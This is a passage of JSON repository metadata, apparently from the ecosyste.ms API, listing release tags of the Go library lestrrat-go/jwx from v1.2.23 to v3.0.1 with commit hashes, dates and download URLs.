12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"